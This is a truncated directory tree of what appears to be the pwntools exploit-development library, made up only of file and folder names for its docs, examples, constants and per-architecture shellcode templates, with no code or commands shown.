├── .gitattributes ├── .github ├── ISSUE_TEMPLATE.md ├── ISSUE_TEMPLATE │ ├── bug_report.md │ ├── feature_request.md │ └── question.md ├── PULL_REQUEST_TEMPLATE.md ├── dependabot.yml └── workflows │ ├── changelog.yml │ ├── ci.yml │ ├── docker.yml │ ├── lint.yml │ ├── merge-conflict.yml │ └── pylint.yml ├── .gitignore ├── .isort.cfg ├── .readthedocs.yaml ├── .sublime-settings ├── CHANGELOG.md ├── CONTRIBUTING.md ├── DOCKER.md ├── LICENSE-pwntools.txt ├── MANIFEST.in ├── README.md ├── SECURITY.md ├── TESTING.md ├── docs ├── .gitignore ├── Makefile ├── requirements.txt └── source │ ├── about.rst │ ├── adb.rst │ ├── args.rst │ ├── asm.rst │ ├── atexception.rst │ ├── atexit.rst │ ├── commandline.rst │ ├── conf.py │ ├── config.rst │ ├── constants.rst │ ├── context.rst │ ├── dynelf.rst │ ├── elf.rst │ ├── elf │ ├── config.rst │ ├── corefile.rst │ └── elf.rst │ ├── encoders.rst │ ├── exception.rst │ ├── filepointer.rst │ ├── filesystem.rst │ ├── flag.rst │ ├── fmtstr.rst │ ├── gdb.rst │ ├── globals.rst │ ├── index.rst │ ├── install.rst │ ├── install │ ├── binutils.rst │ └── headers.rst │ ├── intro.rst │ ├── libcdb.rst │ ├── log.rst │ ├── logo.png │ ├── memleak.rst │ ├── protocols.rst │ ├── qemu.rst │ ├── regsort.rst │ ├── replacements.rst │ ├── rop.rst │ ├── rop │ ├── ret2dlresolve.rst │ ├── rop.rst │ └── srop.rst │ ├── runner.rst │ ├── shellcraft.rst │ ├── shellcraft │ ├── aarch64.rst │ ├── amd64.rst │ ├── arm.rst │ ├── common.rst │ ├── i386.rst │ ├── loongarch64.rst │ ├── mips.rst │ ├── riscv64.rst │ └── thumb.rst │ ├── term.rst │ ├── term │ └── readline.rst │ ├── testexample.rst │ ├── timeout.rst │ ├── tubes.rst │ ├── tubes │ ├── buffer.rst │ ├── processes.rst │ ├── serial.rst │ ├── sockets.rst │ └── ssh.rst │ ├── ui.rst │ ├── update.rst │ ├── useragents.rst │ ├── util │ ├── crc.rst │ ├── cyclic.rst │ ├── fiddling.rst │ ├── getdents.rst │ ├── hashes.rst │ ├── iters.rst │ ├── lists.rst │ ├── misc.rst │ ├── net.rst │ ├── packing.rst │ ├── proc.rst │ ├── safeeval.rst │ ├── sh_string.rst │ └── web.rst │ └── windbg.rst ├── examples ├── README.md ├── android.py ├── args.py ├── asm.py ├── attach.py ├── clean_and_log.py ├── fmtstr │ ├── Makefile │ ├── exploit.py │ ├── exploit2.py │ ├── printf-loop.c │ ├── printf-loop.native │ ├── printf-loop.native32 │ ├── printf.aarch64 │ ├── printf.arm │ ├── printf.c │ ├── printf.mips │ ├── printf.mips64 │ ├── printf.mips64el │ ├── printf.mipsel │ ├── printf.native │ ├── printf.native32 │ ├── printf.ppc │ ├── printf.ppc64 │ └── printf.sparc64 ├── gdb_api.py ├── gen-README.py ├── indented.py ├── listen_uroboros.py ├── options.py ├── port_forward.py ├── readline_completers.py ├── remote.py ├── remote_gdb_debugging.py ├── sigreturn_corefile_aarch64.py ├── sigreturn_corefile_amd64.py ├── sigreturn_corefile_arm.py ├── sigreturn_corefile_i386.py ├── spinners.py ├── splash.py ├── ssh.py ├── text.py └── yesno.py ├── extra ├── bash_completion.d │ ├── README.md │ ├── install.sh │ ├── pwn │ └── shellcraft ├── docker │ ├── Makefile │ ├── README.md │ ├── base │ │ └── Dockerfile │ ├── beta │ │ └── Dockerfile │ ├── dev │ │ └── Dockerfile │ ├── develop │ │ ├── 10-import.py │ │ ├── Dockerfile │ │ └── ipython_config.py │ └── stable │ │ └── Dockerfile ├── textmate │ ├── README.md │ ├── pwntools.YAML-tmLanguage │ ├── pwntools.tmLanguage │ └── screenshot.png └── zsh_completion │ ├── README.md │ ├── _pwn │ └── install.zsh ├── pwn ├── __init__.py └── toplevel.py ├── pwnlib ├── __init__.py ├── abi.py ├── adb │ ├── __init__.py │ ├── adb.py │ ├── bootimg.py │ ├── bootloader.py │ └── protocol.py ├── args.py ├── asm.py ├── atexception.py ├── atexit.py ├── commandline │ ├── __init__.py │ ├── asm.py │ ├── checksec.py │ ├── common.py │ ├── constgrep.py │ ├── cyclic.py │ ├── debug.py │ ├── disablenx.py │ ├── disasm.py │ ├── elfdiff.py │ ├── elfpatch.py │ ├── errno.py │ ├── hex.py │ ├── libcdb.py │ ├── main.py │ ├── phd.py │ ├── pwnstrip.py │ ├── scramble.py │ ├── shellcraft.py │ ├── template.py │ ├── unhex.py │ ├── update.py │ └── version.py ├── config.py ├── constants │ ├── LICENSE.txt │ ├── __init__.py │ ├── android │ ├── cgc │ │ ├── __init__.py │ │ ├── aarch64.py │ │ ├── alpha.py │ │ ├── amd64.py │ │ ├── arm.py │ │ ├── i386.py │ │ ├── ia64.py │ │ ├── mips.py │ │ ├── powerpc.py │ │ ├── powerpc64.py │ │ ├── s390.py │ │ ├── s390x.py │ │ ├── sparc.py │ │ ├── sparc64.py │ │ └── thumb.py │ ├── constant.py │ ├── darwin │ │ ├── __init__.py │ │ ├── aarch64.py │ │ └── amd64.py │ ├── freebsd.py │ └── linux │ │ ├── __init__.py │ │ ├── aarch64.py │ │ ├── alpha.py │ │ ├── amd64.py │ │ ├── arm.py │ │ ├── i386.py │ │ ├── ia64.py │ │ ├── loongarch64.py │ │ ├── mips.py │ │ ├── powerpc.py │ │ ├── powerpc64.py │ │ ├── riscv64.py │ │ ├── s390.py │ │ ├── s390x.py │ │ ├── sparc.py │ │ ├── sparc64.py │ │ └── thumb.py ├── context │ └── __init__.py ├── data │ ├── __init__.py │ ├── crcsums.txt │ ├── elf │ │ ├── __init__.py │ │ ├── fmtstr │ │ │ ├── Makefile │ │ │ ├── __init__.py │ │ │ ├── i386 │ │ │ └── vuln.c │ │ ├── relro │ │ │ ├── __init__.py │ │ │ ├── test-x86-full │ │ │ ├── test-x86-full-nodt │ │ │ ├── test-x86-none │ │ │ ├── test-x86-none-now │ │ │ ├── test-x86-none-now-nodt │ │ │ └── test-x86-partial │ │ ├── ret2dlresolve │ │ │ ├── Makefile │ │ │ ├── __init__.py │ │ │ ├── amd64 │ │ │ ├── i386 │ │ │ └── vuln.c │ │ ├── test-aarch64 │ │ ├── test-aarch64-big │ │ ├── test-aarch64-big-pie │ │ ├── test-aarch64-big-relro │ │ ├── test-aarch64-big-relro-pie │ │ ├── test-aarch64-pie │ │ ├── test-aarch64-relro │ │ ├── test-aarch64-relro-pie │ │ ├── test-arm │ │ ├── test-arm-big │ │ ├── test-arm-big-pie │ │ ├── test-arm-big-relro │ │ ├── test-arm-big-relro-pie │ │ ├── test-arm-pie │ │ ├── test-arm-relro │ │ ├── test-arm-relro-pie │ │ ├── test-mips-big │ │ ├── test-mips-big-pie │ │ ├── test-mips-big-pie-relro │ │ ├── test-mips-big-relro │ │ ├── test-riscv64 │ │ ├── test-riscv64-pie │ │ ├── test-riscv64-relro │ │ ├── test-riscv64-relro-pie │ │ ├── test-thumb │ │ ├── test-thumb-big │ │ ├── test-thumb-big-pie │ │ ├── test-thumb-big-relro │ │ ├── test-thumb-big-relro-pie │ │ ├── test-thumb-pie │ │ ├── test-thumb-relro │ │ ├── test-thumb-relro-pie │ │ ├── test-x32 │ │ ├── test-x32-pie │ │ ├── test-x32-relro │ │ ├── test-x32-relro-pie │ │ ├── test-x64 │ │ ├── test-x64-cfp │ │ ├── test-x64-pie │ │ ├── test-x64-relro │ │ ├── test-x64-relro-pie │ │ ├── test-x86 │ │ ├── test-x86-cfp │ │ ├── test-x86-pie │ │ ├── test-x86-relro │ │ └── test-x86-relro-pie │ ├── includes │ │ ├── LICENSE.txt │ │ ├── android │ │ ├── cgc │ │ │ ├── aarch64.h │ │ │ ├── alpha.h │ │ │ ├── amd64.h │ │ │ ├── arm.h │ │ │ ├── i386.h │ │ │ ├── ia64.h │ │ │ ├── mips.h │ │ │ ├── powerpc.h │ │ │ ├── powerpc64.h │ │ │ ├── s390.h │ │ │ ├── s390x.h │ │ │ ├── sparc.h │ │ │ ├── sparc64.h │ │ │ └── thumb.h │ │ ├── darwin │ │ │ ├── aarch64.h │ │ │ └── amd64.h │ │ ├── freebsd.h │ │ ├── freebsd │ │ │ ├── aarch64.h │ │ │ ├── alpha.h │ │ │ ├── amd64.h │ │ │ ├── arm.h │ │ │ ├── i386.h │ │ │ ├── ia64.h │ │ │ ├── mips.h │ │ │ ├── powerpc.h │ │ │ ├── powerpc64.h │ │ │ ├── s390.h │ │ │ ├── s390x.h │ │ │ ├── sparc.h │ │ │ ├── sparc64.h │ │ │ └── thumb.h │ │ ├── generator │ │ │ ├── freebsd │ │ │ │ ├── common.h │ │ │ │ ├── machine │ │ │ │ │ ├── _align.h │ │ │ │ │ ├── _limits.h │ │ │ │ │ └── signal.h │ │ │ │ ├── sys │ │ │ │ │ ├── _iovec.h │ │ │ │ │ ├── _sigset.h │ │ │ │ │ ├── _sockaddr_storage.h │ │ │ │ │ ├── _timespec.h │ │ │ │ │ ├── _types.h │ │ │ │ │ ├── cdefs.h │ │ │ │ │ ├── errno.h │ │ │ │ │ ├── fcntl.h │ │ │ │ │ ├── mman.h │ │ │ │ │ ├── signal.h │ │ │ │ │ ├── socket.h │ │ │ │ │ ├── stat.h │ │ │ │ │ ├── syscall.h │ │ │ │ │ ├── time.h │ │ │ │ │ └── unistd.h │ │ │ │ └── vm │ │ │ │ │ └── vm.h │ │ │ ├── generate_constants.sh │ │ │ ├── linux │ │ │ │ ├── aarch64.h │ │ │ │ ├── alpha.h │ │ │ │ ├── amd64.h │ │ │ │ ├── arm.h │ │ │ │ ├── common.h │ │ │ │ ├── diet │ │ │ │ │ ├── aarch64 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── alpha │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── arm │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── asm │ │ │ │ │ │ ├── aarch64-sigcontext.h │ │ │ │ │ │ ├── alpha-sigcontext.h │ │ │ │ │ │ ├── arm-sigcontext.h │ │ │ │ │ │ ├── i386-sigcontext.h │ │ │ │ │ │ ├── ia64-sigcontext.h │ │ │ │ │ │ ├── mips-sigcontext.h │ │ │ │ │ │ ├── parisc-sigcontext.h │ │ │ │ │ │ ├── ppc-sigcontext.h │ │ │ │ │ │ ├── s390-sigcontext.h │ │ │ │ │ │ ├── sigcontext.h │ │ │ │ │ │ ├── sparc-sigcontext.h │ │ │ │ │ │ ├── types.h │ │ │ │ │ │ └── x86_64-sigcontext.h │ │ │ │ │ ├── endian.h │ │ │ │ │ ├── errno.h │ │ │ │ │ ├── fcntl.h │ │ │ │ │ ├── i386 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── ia64 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── inttypes.h │ │ │ │ │ ├── linuxnet.h │ │ │ │ │ ├── loongarch64 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── mips │ │ │ │ │ │ ├── mips-asm.h │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── mips64 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── mipsel │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── parisc │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── ppc │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── ppc64 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── ppc64le │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── riscv64 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── s390 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── s390x │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── signal.h │ │ │ │ │ ├── sparc │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── sparc64 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ ├── stddef.h │ │ │ │ │ ├── stdint.h │ │ │ │ │ ├── string.h │ │ │ │ │ ├── sys │ │ │ │ │ │ ├── cdefs.h │ │ │ │ │ │ ├── fsuid.h │ │ │ │ │ │ ├── mman.h │ │ │ │ │ │ ├── ptrace.h │ │ │ │ │ │ ├── select.h │ │ │ │ │ │ ├── socket.h │ │ │ │ │ │ ├── stat.h │ │ │ │ │ │ ├── time.h │ │ │ │ │ │ ├── types.h │ │ │ │ │ │ ├── ucontext.h │ │ │ │ │ │ └── uio.h │ │ │ │ │ ├── unistd.h │ │ │ │ │ ├── x32 │ │ │ │ │ │ └── syscalls.h │ │ │ │ │ └── x86_64 │ │ │ │ │ │ ├── syscalls.h │ │ │ │ │ │ └── syscalls32.h │ │ │ │ ├── i386.h │ │ │ │ ├── ia64.h │ │ │ │ ├── loongarch64.h │ │ │ │ ├── mips.h │ │ │ │ ├── powerpc.h │ │ │ │ ├── powerpc64.h │ │ │ │ ├── riscv64.h │ │ │ │ ├── s390.h │ │ │ │ ├── s390x.h │ │ │ │ ├── sparc.h │ │ │ │ ├── sparc64.h │ │ │ │ ├── syscall_map.h │ │ │ │ └── thumb.h │ │ │ └── load_constants.py │ │ └── linux │ │ │ ├── aarch64.h │ │ │ ├── alpha.h │ │ │ ├── amd64.h │ │ │ ├── arm.h │ │ │ ├── i386.h │ │ │ ├── ia64.h │ │ │ ├── loongarch64.h │ │ │ ├── mips.h │ │ │ ├── powerpc.h │ │ │ ├── powerpc64.h │ │ │ ├── riscv64.h │ │ │ ├── s390.h │ │ │ ├── s390x.h │ │ │ ├── sparc.h │ │ │ ├── sparc64.h │ │ │ └── thumb.h │ ├── syscalls │ │ ├── Makefile │ │ ├── generate.py │ │ └── generate_darwin.py │ ├── templates │ │ └── pwnup.mako │ └── useragents │ │ ├── LICENSE.txt │ │ ├── download-useragents.py │ │ └── useragents.txt ├── device.py ├── dynelf.py ├── elf │ ├── __init__.py │ ├── config.py │ ├── corefile.py │ ├── datatypes.py │ ├── elf.py │ ├── maps.py │ └── plt.py ├── encoders │ ├── __init__.py │ ├── amd64 │ │ ├── __init__.py │ │ └── delta.py │ ├── arm │ │ ├── __init__.py │ │ ├── alphanumeric │ │ │ ├── ARM_Instructions.py │ │ │ ├── __init__.py │ │ │ ├── alphanum_byte.py │ │ │ ├── alphanumeric.py │ │ │ ├── builder.py │ │ │ └── random_funcs.py │ │ └── xor.py │ ├── encoder.py │ ├── i386 │ │ ├── __init__.py │ │ ├── ascii_shellcode.py │ │ ├── delta.py │ │ └── xor.py │ └── mips │ │ ├── __init__.py │ │ └── xor.py ├── exception.py ├── filepointer.py ├── filesystem │ ├── __init__.py │ ├── path.py │ └── ssh.py ├── flag │ ├── __init__.py │ └── flag.py ├── fmtstr.py ├── gdb.py ├── gdb_api_bridge.py ├── gdb_faketerminal.py ├── internal │ ├── __init__.py │ └── dochelper.py ├── lexer.py ├── libcdb.py ├── log.py ├── memleak.py ├── protocols │ ├── __init__.py │ └── adb │ │ └── __init__.py ├── py2compat.py ├── qemu.py ├── regsort.py ├── replacements.py ├── rop │ ├── __init__.py │ ├── call.py │ ├── gadgets.py │ ├── ret2csu.py │ ├── ret2dlresolve.py │ ├── rop.py │ └── srop.py ├── runner.py ├── shellcraft │ ├── __init__.py │ ├── internal.py │ ├── registers.py │ └── templates │ │ ├── __doc__ │ │ ├── aarch64 │ │ ├── __doc__ │ │ ├── android │ │ ├── breakpoint.asm │ │ ├── crash.asm │ │ ├── darwin │ │ │ ├── __doc__ │ │ │ ├── cat.asm │ │ │ ├── cat2.asm │ │ │ ├── open.asm │ │ │ ├── syscall.asm │ │ │ └── syscalls │ │ │ │ ├── __doc__ │ │ │ │ ├── execve.asm │ │ │ │ ├── exit.asm │ │ │ │ ├── getdirentries64.asm │ │ │ │ ├── getxattr.asm │ │ │ │ ├── lseek.asm │ │ │ │ ├── read.asm │ │ │ │ └── write.asm │ │ ├── freebsd │ │ │ ├── __doc__ │ │ │ └── syscall.asm │ │ ├── infloop.asm │ │ ├── linux │ │ │ ├── __doc__ │ │ │ ├── cat.asm │ │ │ ├── cat2.asm │ │ │ ├── connect.asm │ │ │ ├── dupio.asm │ │ │ ├── dupsh.asm │ │ │ ├── echo.asm │ │ │ ├── forkexit.asm │ │ │ ├── kill.asm │ │ │ ├── killparent.asm │ │ │ ├── loader.asm │ │ │ ├── loader_append.asm │ │ │ ├── open.asm │ │ │ ├── readn.asm │ │ │ ├── setresuid.asm │ │ │ ├── sh.asm │ │ │ ├── sleep.asm │ │ │ ├── socket.asm │ │ │ ├── stage.asm │ │ │ ├── syscall.asm │ │ │ └── syscalls │ │ ├── memcpy.asm │ │ ├── mov.asm │ │ ├── push.asm │ │ ├── pushstr.asm │ │ ├── pushstr_array.asm │ │ ├── setregs.asm │ │ ├── trap.asm │ │ └── xor.asm │ │ ├── amd64 │ │ ├── __doc__ │ │ ├── android │ │ ├── crash.asm │ │ ├── darwin │ │ │ ├── __doc__ │ │ │ ├── cat.asm │ │ │ ├── cat2.asm │ │ │ ├── open.asm │ │ │ ├── syscall.asm │ │ │ └── syscalls │ │ │ │ ├── __doc__ │ │ │ │ ├── execve.asm │ │ │ │ ├── exit.asm │ │ │ │ ├── getdirentries64.asm │ │ │ │ ├── getxattr.asm │ │ │ │ ├── lseek.asm │ │ │ │ ├── read.asm │ │ │ │ └── write.asm │ │ ├── freebsd │ │ │ ├── __doc__ │ │ │ ├── amd64_to_i386.asm │ │ │ └── syscall.asm │ │ ├── infloop.asm │ │ ├── itoa.asm │ │ ├── linux │ │ │ ├── __doc__ │ │ │ ├── amd64_to_i386.asm │ │ │ ├── bindsh.asm │ │ │ ├── cat.asm │ │ │ ├── cat2.asm │ │ │ ├── connect.asm │ │ │ ├── connectstager.asm │ │ │ ├── dupio.asm │ │ │ ├── dupsh.asm │ │ │ ├── echo.asm │ │ │ ├── egghunter.asm │ │ │ ├── findpeer.asm │ │ │ ├── findpeersh.asm │ │ │ ├── findpeerstager.asm │ │ │ ├── forkbomb.asm │ │ │ ├── forkexit.asm │ │ │ ├── getpid.asm │ │ │ ├── kill.asm │ │ │ ├── killparent.asm │ │ │ ├── listen.asm │ │ │ ├── loader.asm │ │ │ ├── loader_append.asm │ │ │ ├── membot.asm │ │ │ ├── migrate_stack.asm │ │ │ ├── mmap_rwx.asm │ │ │ ├── read.asm │ │ │ ├── read_upto.asm │ │ │ ├── readfile.asm │ │ │ ├── readinto.asm │ │ │ ├── readloop.asm │ │ │ ├── readn.asm │ │ │ ├── readptr.asm │ │ │ ├── recvsize.asm │ │ │ ├── setregid.asm │ │ │ ├── setresuid.asm │ │ │ ├── setreuid.asm │ │ │ ├── sh.asm │ │ │ ├── sleep.asm │ │ │ ├── socket.asm │ │ │ ├── stage.asm │ │ │ ├── stager.asm │ │ │ ├── strace_dos.asm │ │ │ ├── syscall.asm │ │ │ ├── syscalls │ │ │ └── writeloop.asm │ │ ├── memcpy.asm │ │ ├── mov.asm │ │ ├── nop.asm │ │ ├── popad.asm │ │ ├── push.asm │ │ ├── pushad.asm │ │ ├── pushstr.asm │ │ ├── pushstr_array.asm │ │ ├── ret.asm │ │ ├── setregs.asm │ │ ├── strcpy.asm │ │ ├── strlen.asm │ │ ├── trap.asm │ │ ├── windows │ │ │ ├── __doc__ │ │ │ ├── cmd.asm │ │ │ ├── getexport.asm │ │ │ ├── getprocaddress.asm │ │ │ ├── kernel32base.asm │ │ │ ├── ntdllbase.asm │ │ │ ├── peb.asm │ │ │ ├── teb.asm │ │ │ └── winexec.asm │ │ └── xor.asm │ │ ├── arm │ │ ├── __doc__ │ │ ├── android │ │ ├── crash.asm │ │ ├── freebsd │ │ │ ├── __doc__ │ │ │ └── syscall.asm │ │ ├── infloop.asm │ │ ├── itoa.asm │ │ ├── linux │ │ │ ├── __doc__ │ │ │ ├── cacheflush.asm │ │ │ ├── cat.asm │ │ │ ├── cat2.asm │ │ │ ├── connect.asm │ │ │ ├── dir.asm │ │ │ ├── dupio.asm │ │ │ ├── dupsh.asm │ │ │ ├── echo.asm │ │ │ ├── egghunter.asm │ │ │ ├── forkbomb.asm │ │ │ ├── forkexit.asm │ │ │ ├── kill.asm │ │ │ ├── killparent.asm │ │ │ ├── open_file.asm │ │ │ ├── setresuid.asm │ │ │ ├── sh.asm │ │ │ ├── sleep.asm │ │ │ ├── syscall.asm │ │ │ └── syscalls │ │ ├── memcpy.asm │ │ ├── mov.asm │ │ ├── nop.asm │ │ ├── push.asm │ │ ├── pushstr.asm │ │ ├── pushstr_array.asm │ │ ├── ret.asm │ │ ├── setregs.asm │ │ ├── to_thumb.asm │ │ ├── trap.asm │ │ ├── udiv_10.asm │ │ └── xor.asm │ │ ├── common │ │ ├── __doc__ │ │ ├── freebsd │ │ │ └── __doc__ │ │ ├── label.asm │ │ └── linux │ │ │ ├── __doc__ │ │ │ ├── kill.asm │ │ │ ├── sleep.asm │ │ │ └── syscalls │ │ │ ├── __doc__ │ │ │ ├── _llseek.asm │ │ │ ├── _newselect.asm │ │ │ ├── _sysctl.asm │ │ │ ├── accept.asm │ │ │ ├── accept4.asm │ │ │ ├── access.asm │ │ │ ├── acct.asm │ │ │ ├── add_key.asm │ │ │ ├── adjtimex.asm │ │ │ ├── afs_syscall.asm │ │ │ ├── alarm.asm │ │ │ ├── arch_prctl.asm │ │ │ ├── arch_specific_syscall.asm │ │ │ ├── arm_fadvise64_64.asm │ │ │ ├── arm_sync_file_range.asm │ │ │ ├── bdflush.asm │ │ │ ├── bind.asm │ │ │ ├── bpf.asm │ │ │ ├── break_.asm │ │ │ ├── brk.asm │ │ │ ├── cachectl.asm │ │ │ ├── cacheflush.asm │ │ │ ├── capget.asm │ │ │ ├── capset.asm │ │ │ ├── chdir.asm │ │ │ ├── chmod.asm │ │ │ ├── chown.asm │ │ │ ├── chown32.asm │ │ │ ├── chroot.asm │ │ │ ├── clock_adjtime.asm │ │ │ ├── clock_adjtime64.asm │ │ │ ├── clock_getres.asm │ │ │ ├── clock_getres_time64.asm │ │ │ ├── clock_gettime.asm │ │ │ ├── clock_gettime64.asm │ │ │ ├── clock_nanosleep.asm │ │ │ ├── clock_nanosleep_time64.asm │ │ │ ├── clock_settime.asm │ │ │ ├── clock_settime64.asm │ │ │ ├── clone.asm │ │ │ ├── clone3.asm │ │ │ ├── close.asm │ │ │ ├── close_range.asm │ │ │ ├── connect.asm │ │ │ ├── copy_file_range.asm │ │ │ ├── creat.asm │ │ │ ├── create_module.asm │ │ │ ├── delete_module.asm │ │ │ ├── dup.asm │ │ │ ├── dup2.asm │ │ │ ├── dup3.asm │ │ │ ├── epoll_create.asm │ │ │ ├── epoll_create1.asm │ │ │ ├── epoll_ctl.asm │ │ │ ├── epoll_ctl_old.asm │ │ │ ├── epoll_pwait.asm │ │ │ ├── epoll_pwait2.asm │ │ │ ├── epoll_wait.asm │ │ │ ├── epoll_wait_old.asm │ │ │ ├── eventfd.asm │ │ │ ├── eventfd2.asm │ │ │ ├── execve.asm │ │ │ ├── execveat.asm │ │ │ ├── exit.asm │ │ │ ├── exit_group.asm │ │ │ ├── faccessat.asm │ │ │ ├── faccessat2.asm │ │ │ ├── fadvise64.asm │ │ │ ├── fadvise64_64.asm │ │ │ ├── fallocate.asm │ │ │ ├── fanotify_init.asm │ │ │ ├── fanotify_mark.asm │ │ │ ├── fchdir.asm │ │ │ ├── fchmod.asm │ │ │ ├── fchmodat.asm │ │ │ ├── fchown.asm │ │ │ ├── fchown32.asm │ │ │ ├── fchownat.asm │ │ │ ├── fcntl.asm │ │ │ ├── fcntl64.asm │ │ │ ├── fdatasync.asm │ │ │ ├── fgetxattr.asm │ │ │ ├── finit_module.asm │ │ │ ├── flistxattr.asm │ │ │ ├── flock.asm │ │ │ ├── fork.asm │ │ │ ├── fremovexattr.asm │ │ │ ├── fsconfig.asm │ │ │ ├── fsetxattr.asm │ │ │ ├── fsmount.asm │ │ │ ├── fsopen.asm │ │ │ ├── fspick.asm │ │ │ ├── fstat.asm │ │ │ ├── fstat64.asm │ │ │ ├── fstatat.asm │ │ │ ├── fstatat64.asm │ │ │ ├── fstatfs.asm │ │ │ ├── fstatfs64.asm │ │ │ ├── fsync.asm │ │ │ ├── ftime.asm │ │ │ ├── ftruncate.asm │ │ │ ├── ftruncate64.asm │ │ │ ├── futex.asm │ │ │ ├── futex_time64.asm │ │ │ ├── futimesat.asm │ │ │ ├── get_kernel_syms.asm │ │ │ ├── get_mempolicy.asm │ │ │ ├── get_robust_list.asm │ │ │ ├── get_thread_area.asm │ │ │ ├── getcpu.asm │ │ │ ├── getcwd.asm │ │ │ ├── getdents.asm │ │ │ ├── getdents64.asm │ │ │ ├── getegid.asm │ │ │ ├── getegid32.asm │ │ │ ├── geteuid.asm │ │ │ ├── geteuid32.asm │ │ │ ├── getgid.asm │ │ │ ├── getgid32.asm │ │ │ ├── getgroups.asm │ │ │ ├── getgroups32.asm │ │ │ ├── getitimer.asm │ │ │ ├── getpeername.asm │ │ │ ├── getpgid.asm │ │ │ ├── getpgrp.asm │ │ │ ├── getpid.asm │ │ │ ├── getpmsg.asm │ │ │ ├── getppid.asm │ │ │ ├── getpriority.asm │ │ │ ├── getrandom.asm │ │ │ ├── getresgid.asm │ │ │ ├── getresgid32.asm │ │ │ ├── getresuid.asm │ │ │ ├── getresuid32.asm │ │ │ ├── getrlimit.asm │ │ │ ├── getrusage.asm │ │ │ ├── getsid.asm │ │ │ ├── getsockname.asm │ │ │ ├── getsockopt.asm │ │ │ ├── gettid.asm │ │ │ ├── gettimeofday.asm │ │ │ ├── getuid.asm │ │ │ ├── getuid32.asm │ │ │ ├── getxattr.asm │ │ │ ├── gtty.asm │ │ │ ├── ia32_arch_prctl.asm │ │ │ ├── ia32_io_pgetevents.asm │ │ │ ├── ia32_rseq.asm │ │ │ ├── ia32_statx.asm │ │ │ ├── idle.asm │ │ │ ├── init_module.asm │ │ │ ├── inotify_add_watch.asm │ │ │ ├── inotify_init.asm │ │ │ ├── inotify_init1.asm │ │ │ ├── inotify_rm_watch.asm │ │ │ ├── io_cancel.asm │ │ │ ├── io_destroy.asm │ │ │ ├── io_getevents.asm │ │ │ ├── io_pgetevents.asm │ │ │ ├── io_pgetevents_time64.asm │ │ │ ├── io_setup.asm │ │ │ ├── io_submit.asm │ │ │ ├── io_uring_enter.asm │ │ │ ├── io_uring_register.asm │ │ │ ├── io_uring_setup.asm │ │ │ ├── ioctl.asm │ │ │ ├── ioperm.asm │ │ │ ├── iopl.asm │ │ │ ├── ioprio_get.asm │ │ │ ├── ioprio_set.asm │ │ │ ├── ipc.asm │ │ │ ├── kcmp.asm │ │ │ ├── kexec_file_load.asm │ │ │ ├── kexec_load.asm │ │ │ ├── keyctl.asm │ │ │ ├── kill.asm │ │ │ ├── landlock_add_rule.asm │ │ │ ├── landlock_create_ruleset.asm │ │ │ ├── landlock_restrict_self.asm │ │ │ ├── lchown.asm │ │ │ ├── lchown32.asm │ │ │ ├── lgetxattr.asm │ │ │ ├── link.asm │ │ │ ├── linkat.asm │ │ │ ├── listen.asm │ │ │ ├── listxattr.asm │ │ │ ├── llistxattr.asm │ │ │ ├── lock.asm │ │ │ ├── lookup_dcookie.asm │ │ │ ├── lremovexattr.asm │ │ │ ├── lseek.asm │ │ │ ├── lsetxattr.asm │ │ │ ├── lstat.asm │ │ │ ├── lstat64.asm │ │ │ ├── madvise.asm │ │ │ ├── madvise1.asm │ │ │ ├── mbind.asm │ │ │ ├── membarrier.asm │ │ │ ├── memfd_create.asm │ │ │ ├── migrate_pages.asm │ │ │ ├── mincore.asm │ │ │ ├── mkdir.asm │ │ │ ├── mkdirat.asm │ │ │ ├── mknod.asm │ │ │ ├── mknodat.asm │ │ │ ├── mlock.asm │ │ │ ├── mlock2.asm │ │ │ ├── mlockall.asm │ │ │ ├── mmap.asm │ │ │ ├── mmap2.asm │ │ │ ├── modify_ldt.asm │ │ │ ├── mount.asm │ │ │ ├── mount_setattr.asm │ │ │ ├── move_mount.asm │ │ │ ├── move_pages.asm │ │ │ ├── mprotect.asm │ │ │ ├── mpx.asm │ │ │ ├── mq_getsetattr.asm │ │ │ ├── mq_notify.asm │ │ │ ├── mq_open.asm │ │ │ ├── mq_timedreceive.asm │ │ │ ├── mq_timedreceive_time64.asm │ │ │ ├── mq_timedsend.asm │ │ │ ├── mq_timedsend_time64.asm │ │ │ ├── mq_unlink.asm │ │ │ ├── mremap.asm │ │ │ ├── msgctl.asm │ │ │ ├── msgget.asm │ │ │ ├── msgrcv.asm │ │ │ ├── msgsnd.asm │ │ │ ├── msync.asm │ │ │ ├── multiplexer.asm │ │ │ ├── munlock.asm │ │ │ ├── munlockall.asm │ │ │ ├── munmap.asm │ │ │ ├── name_to_handle_at.asm │ │ │ ├── nanosleep.asm │ │ │ ├── newfstatat.asm │ │ │ ├── nfsservctl.asm │ │ │ ├── nice.asm │ │ │ ├── oldfstat.asm │ │ │ ├── oldlstat.asm │ │ │ ├── oldolduname.asm │ │ │ ├── oldstat.asm │ │ │ ├── olduname.asm │ │ │ ├── open.asm │ │ │ ├── open_by_handle_at.asm │ │ │ ├── open_tree.asm │ │ │ ├── openat.asm │ │ │ ├── openat2.asm │ │ │ ├── pause.asm │ │ │ ├── pciconfig_iobase.asm │ │ │ ├── pciconfig_read.asm │ │ │ ├── pciconfig_write.asm │ │ │ ├── perf_event_open.asm │ │ │ ├── personality.asm │ │ │ ├── pidfd_getfd.asm │ │ │ ├── pidfd_open.asm │ │ │ ├── pidfd_send_signal.asm │ │ │ ├── pipe.asm │ │ │ ├── pipe2.asm │ │ │ ├── pivot_root.asm │ │ │ ├── pkey_alloc.asm │ │ │ ├── pkey_free.asm │ │ │ ├── pkey_mprotect.asm 